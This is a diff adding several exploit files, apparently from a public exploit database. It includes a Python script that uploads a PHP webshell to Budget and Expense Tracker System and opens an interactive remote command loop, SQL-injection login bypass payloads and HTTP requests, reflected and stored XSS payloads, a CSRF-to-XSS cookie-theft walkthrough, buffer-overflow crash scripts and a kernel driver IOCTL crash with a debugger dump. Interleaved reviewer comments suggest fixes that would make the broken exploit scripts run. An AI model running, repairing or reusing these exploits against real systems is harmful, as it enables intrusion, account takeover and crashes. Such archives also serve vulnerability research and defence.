@@ -0,0 +1,129 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Exploit Author: Abdullah Khawaja (hax.3xploit) +# Date: 2021-09-21 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip +# Version: 2.0 +# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 +# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. + + + +# RCE via executing exploit: + # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py + # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/ + + +import requests, sys, urllib, re +import datetime +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + + + + + +header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL + +print(Style.BRIGHT+" Budget and Expense Tracker System 1.0") +print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) +print(header) + +print(r""" + ______ _______ ________ + ___ //_/__ /_______ ___ _______ ______(_)_____ _ + __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ + _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / + /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ + /___/ + abdullahkhawaja.com + """) + + + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults + +proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + + +#Create a new 
session +s = requests.Session() + + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + + +def webshell(LINK, session): + try: + WEB_SHELL = LINK+'/uploads/'+filename + getdir = {'cmd': 'echo %CD%'} + r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies) + status = r2.status_code + if status != 200: + print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + while True: + thought = input(term) + command = {'cmd': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print("\r\nExiting.") + sys.exit(-1) + + +#Creating a PHP Web Shell + +phpshell = { + 'img': + ( + 'shell.php', + '', + 'application/octet-stream', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'} + + +def id_generator(): + x = datetime.datetime.now() + date_string = x.strftime("%y-%m-%d %H:%M") + date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") + timestamp = datetime.datetime.timestamp(date) + file = int(timestamp) + final_name = str(file)+'_shell.php' + return final_name + +filename = id_generator() +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies) + +shell_upload = True if("1" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload 
The PHP Shell!", RESET) + + + +#Executing The Webshell +webshell(LINK, s) \ No newline at end of file diff --git a/exploits/php/webapps/50349.txt b/exploits/php/webapps/50349.txt new file mode 100644 index 000000000..5f517cd32 --- /dev/null +++ b/exploits/php/webapps/50349.txt @@ -0,0 +1,13 @@ +# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) +# Date: 2/15/2021 +# Author: 0xB9 +# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip +# Version: 1.3.1 +# Tested on: Windows 10 +# CVE: CVE-2021-24287 + +1. Description: +The tab parameter in the Admin Panel is vulnerable to XSS. + +2. Proof of Concept: +wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/); \ No newline at end of file diff --git a/exploits/php/webapps/50362.txt b/exploits/php/webapps/50362.txt new file mode 100644 index 000000000..ec0900d30 --- /dev/null +++ b/exploits/php/webapps/50362.txt 
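Review bot: `proxies` is hard-coded to `127.0.0.1:8080` and passed to every request, so the script fails with a `ProxyError` unless an intercepting proxy happens to be listening; make it optional (`proxies = None` by default, with a comment that the Burp setting is for debugging). The bare `except:` in `webshell()` swallows every exception, including `KeyboardInterrupt`, and prints only `Exiting.`, hiding the cause; catch `requests.RequestException` and report the message. The header says `Version: 2.0` while the title and description say 1.0, and `cookies` carries a fixed `PHPSESSID` value whose origin is never explained. `id_generator()` derives the expected server-side file name from the client's clock truncated to the minute; a comment should state that this assumes the server renames uploads with its own timestamp (the rename scheme is not visible here) and that clock skew between client and server breaks the guess.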
@@ -0,0 +1,40 @@
+# Exploit Title: Blood Bank System 1.0 - Authentication Bypass
+# Date: 30-9-2021
+# Exploit Author: Nitin Sharma (vidvansh)
+# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
+# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
+# Version: 1.0
+# Tested on: Windows 10 , Apache , Mysql
+
+# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
+
+#Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
+Step 5 – Click forward and now you will be logged in as admin.
+
+# PoC:
+
+GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bloodbank/login.php
+Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+# Authentication Bypass:
+
+# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password =>
+Username: ** Random email**
+Password: ' or 1 -- -
\ No newline at end of file
diff --git a/exploits/php/webapps/50372.txt b/exploits/php/webapps/50372.txt
new file mode 100644
index 000000000..e76467090
--- /dev/null
+++ b/exploits/php/webapps/50372.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass
+# Date: 2021-09-20
+# Exploit Author: Nitin Sharma(vidvansh)
+# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
+# Version: v1.0
+# Tested on: Windows 10 - XAMPP Server
+
+
+# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
+
+#Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
+Step 5 – Click forward and now you will be logged in as admin.
+
+# PoC:
+
+POST /lodge/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/lodge/admin/login.php
+Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+
+
+
+# Authentication Bypass:
+
+# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>
+Username: ' or 1 -- -
+Password: ' or 1 -- -
\ No newline at end of file
diff --git a/exploits/php/webapps/50460.txt b/exploits/php/webapps/50460.txt
new file mode 100644
index 000000000..e6dd9d353
--- /dev/null
+++ b/exploits/php/webapps/50460.txt @@ -0,0 +1,21 @@ +# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) +# Date: 10/27/2021 +# Exploit Author: Murat DEMIRCI (@butterflyhunt3r) +# Vendor Homepage: https://supsystic.com/ +# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/ +# Version: 1.7.18 +# Tested on : Windows 10 + +#Poc: + +1. Install Latest WordPress + +2. Install and activate plugin. + +3. Open plugin, click "Add New Form" and select any form. + +4. Click "Fields" tab and "Add New Field". Choose whatever you want. + +5. Inject JavaScript payload which is mentioned below into 'label' field, save and alert will appear on the screen. + +Payload : \ No newline at end of file diff --git a/exploits/php/webapps/50461.html b/exploits/php/webapps/50461.html new file mode 100644 index 000000000..179e2ecc2 --- /dev/null +++ b/exploits/php/webapps/50461.html @@ -0,0 +1,47 @@ +# Exploit Title: PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) +# Date: 2021-10-27 +# Exploit Author: Anubhav Singh +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/hostel-management-system/ +# Version: V 2.1 +# Vulnerable endpoint: http://localhost/hostel/hostel/my-profile.php +# Tested on Windows 10, XAMPP + +Steps to reproduce: + +1) Navigate to http://localhost/hostel/hostel/my-profile.php +2) Enter xss payload "> in name field +3) Click on Update Profile and intercept the request in Burpsuite +4) Generate a CSRF POC of Update Profile + +``` + + + +
+ + </script>" /> + + + + + + + + + + + +``` + +5) Send this POC to victim +6) When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires. +7) Now attacker get's the details of victim like ip address, cookies of Victim, etc +8) So attacker is able to steal Victim's cookies successfully!! Account takeover!!! + +#POC + +https://ibb.co/jVcZxnt +https://ibb.co/DwGh4x9 \ No newline at end of file diff --git a/exploits/windows/dos/49337.py b/exploits/windows/dos/49337.py new file mode 100755 index 000000000..f14395c6d --- /dev/null +++ b/exploits/windows/dos/49337.py @@ -0,0 +1,25 @@ +# Exploit Title: Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) +# Date: 22.12.2020 +# Software Link: http://www.tucows.com/download/windows/files/ezcdsetup.exe +# Exploit Author: Achilles +# Tested Version: 4.13 +# Tested on: Windows 7 x64 Sp1 + +# 1.- Run python code :Creator.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Easy CD & DVD Cover Creator.exe +# 4.- Press Unlock Now +# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number' +# 5.- Press 'Continue'and you will see a crash. + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: +open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/49964.py b/exploits/windows/dos/49964.py new file mode 100755 index 000000000..81d53fcc7 --- /dev/null +++ b/exploits/windows/dos/49964.py 
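Review bot: The `open("Evil.txt","w")` result is never bound to `f`, so `f.write(buffer)` raises `NameError`, the bare `except:` catches it and the script prints `File cannot be created` even though an empty `Evil.txt` was in fact created; write `with open("Evil.txt", "w") as f:` and drop the manual `close()`. The header tells the user to open `EVIL.txt` while the code writes `Evil.txt`, which matters on a case-sensitive filesystem. The `print` statements without parentheses tie the script to Python 2, and the `#!/usr/bin/env python` shebang sits after the header comments where it has no effect. The lines inside `try`/`except` also appear unindented in the committed text, which would make the file fail to parse at all; if that is not an artefact of the collapsed diff it needs fixing first.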
@@ -0,0 +1,20 @@ +# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe +# Version: 1.6.8 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Go to Register > Enter Registration Code... +#3.- Write anything in 'Name' field +#4.- Paste clipboard in 'Key' field +#5.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("NBM.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/49965.py b/exploits/windows/dos/49965.py new file mode 100755 index 000000000..e64c698ad --- /dev/null +++ b/exploits/windows/dos/49965.py @@ -0,0 +1,21 @@ +# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC) +# Date: 07/06/2021 +# Author: Erick Galindo +# Vendor Homepage: http://www.nsauditor.com +# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe +# Version: 3.2.3.0 +# Tested on: Windows 10 Pro x64 es + +# Proof of Concept: +#1.- Copy printed "AAAAA..." string to clipboard! +#2.- Open Nsauditor.exe +#3.- Go to Register > Enter Registration Code... +#4.- Write anything in 'Name' field +#5.- Paste clipboard in 'Key' field +#6.- Click on button -> Ok + +buffer = "\x41" * 256 + +f = open ("NBM.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/50266.py b/exploits/windows/dos/50266.py new file mode 100755 index 000000000..8327b66c3 --- /dev/null +++ b/exploits/windows/dos/50266.py 
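Review bot: The Proof of Concept steps say to copy the printed `AAAAA...` string, but nothing is printed — the script writes the 256 bytes to `NBM.txt` and exits silently — so the steps and the code disagree; either add `print(buffer)` or change step 1 to say to open `NBM.txt`. The same mismatch is in the Nsauditor PoC in the next hunk, which is a copy of this one and also writes `NBM.txt` (the NBMonitor name) rather than a product-specific file. Both would read better as `with open("NBM.txt", "w") as f: f.write(buffer)`.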
@@ -0,0 +1,38 @@ +# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service +# Date: 9/5/2021 +# Exploit Author: Eric Salario +# Vendor Homepage: https://www.smartftp.com/en-us/ +# Software Link: https://www.smartftp.com/en-us/download +# Version: 10.0.2909.0 (32 and 64 bit) +# Tested on: Microsoft Windows 10 32 bit and 64 bit + +========================================================================= + +buffer = "//" +buffer += "A" * 423 + +f = open ("path.txt", "w") +f.write(buffer) +f.close() + +1. Run the python script +2. Open SmartFTP > New Connection > FTPS (explicit) +3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) +4. In Path, copy paste the content of the "path.txt" generated by the python script +5. Click "OK" +6. SmartFTP client crashes + +======================================================================= +1. Open SmartFTP > New Connection > FTPS (explicit) +2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255) +3. In Path, type slash ("/") and click "OK" +4. The app should return "Error 0x80072741" +5. In the path's search bar, replace slash ("/") with whatever and press enter +6. SmartFTP client crashes + +======================================================================= + +1. Open SmartFTP +2. In the "New Connection" bar, clear the history (dropdown to the right of the bar) +3. Once the history is empty, click the bar and type anything +3. SmartFTP client crashes \ No newline at end of file diff --git a/exploits/windows/dos/50311.py b/exploits/windows/dos/50311.py new file mode 100755 index 000000000..b670f0fd6 --- /dev/null +++ b/exploits/windows/dos/50311.py 
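Review bot: The numbered reproduction steps and the `====` separator lines are plain text inside a `.py` file, so running it raises a `SyntaxError` before the `open`/`write` code executes; prefix those lines with `#` or move them into a docstring. The `path.txt` write should use `with open("path.txt", "w") as f:` so the file is closed on error too. The header gives no Python version, and `"A" * 423` could carry a comment explaining why that length was chosen (I can't tell from the hunk whether it is a minimum).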
@@ -0,0 +1,300 @@ +# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) +# Date: 2021/04/07 +# Exploit Author: Quadron Research Lab +# Version: all version +# Tested on: Windows 10 x64 HUN/ENG Professional +# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029 +# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr + +import ctypes, sys +from ctypes import * +import io +from itertools import product +from sys import argv + +devicename = "GM312Fltr" + +ioctl = 0x22245C + +ioctl_list = ''' +0x22245C +0x222440 +0x222441 +0x222400 +0x222404 +0x222408 +0x222420 +0x222424 +0x222448 +0x222450 +0x22245c +0x222460 +''' + +kernel32 = windll.kernel32 +hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None) + +if not hevDevice or hevDevice == -1: + print ("Not Win! Sorry!") + +else: + print ("OPENED!") + + buf = 'A' * 2000 + bufLength = 2000 + + kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) + +[Bugcheck Analysis] +Fatal System Error 0x000000f7 + (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000) + +Break instruction exception - code 80000003 (first chance) +nt!DbgBreakPointWithStatus +fffff807`2e1feb90 cc int 3 +0 kd !analyze +Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE +Loading Kernel Symbols +............................................................... +................................................................ +........................ + +Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long. +Run !sym noisy before .reload to track down problems loading symbols. + +........................................ +............................. +Loading User Symbols +............................................. +Loading unloaded module list +........ 
+ + + Bugcheck Analysis + + + +DRIVER_OVERRAN_STACK_BUFFER (f7) +A driver has overrun a stack-based buffer. This overrun could potentially +allow a malicious user to gain control of this machine. +DESCRIPTION +A driver overran a stack-based buffer (or local variable) in a way that would +have overwritten the function's return address and jumped back to an arbitrary +address when the function returned. This is the classic buffer overrun +hacking attack and the system has been brought down to prevent a malicious user +from gaining complete control of it. +Do a kb to get a stack backtrace -- the last routine on the stack before the +buffer overrun handlers and bugcheck call is the one that overran its local +variable(s). +Arguments +Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack +Arg2 0000f80736bc1742, Expected security check cookie +Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie +Arg4 0000000000000000, zero + +Debugging Details +------------------ + + +BUGCHECK_CODE f7 + +BUGCHECK_P1 bebea1caeaf0a2c1 + +BUGCHECK_P2 f80736bc1742 + +BUGCHECK_P3 ffff07f8c943e8bd + +BUGCHECK_P4 0 + +PROCESS_NAME pythonw.exe + +SYMBOL_NAME GM312Fltr+e1e + +MODULE_NAME GM312Fltr + +IMAGE_NAME GM312Fltr.sys + +FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function + +FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d} + +Followup MachineOwner +--------- + +0 kd kb +RetAddr Args to Child Call Site +fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus +fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12 +fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946 +fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107 +fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 
fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e +fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7 +fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf +fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297 +fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186 +fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12 +fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue +fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125 +fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320 +fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377 +fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76 +fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500 +fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f +fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233 +fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 +41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 